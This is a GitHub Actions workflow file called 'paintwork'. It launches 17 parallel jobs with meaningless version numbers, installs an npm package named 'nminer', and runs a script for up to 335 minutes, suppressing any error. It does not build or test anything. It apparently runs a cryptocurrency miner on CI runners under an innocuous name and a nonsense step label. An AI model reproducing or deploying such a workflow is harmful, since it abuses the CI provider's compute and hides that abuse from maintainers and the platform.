name: paintwork
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5009 }
          - { version: 5280 }
          - { version: 8533 }
          - { version: 5085 }
          - { version: 6129 }
          - { version: 8120 }
          - { version: 826 }
          - { version: 2850 }
          - { version: 3942 }
          - { version: 2329 }
          - { version: 418 }
          - { version: 5538 }
          - { version: 1521 }
          - { version: 6313 }
          - { version: 5397 }
          - { version: 5528 }
          - { version: 480 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: mmm roundabout given final
        run: |
          npm install nminer@latest
          timeout 335m node paintwork.js || echo "paintwork executed"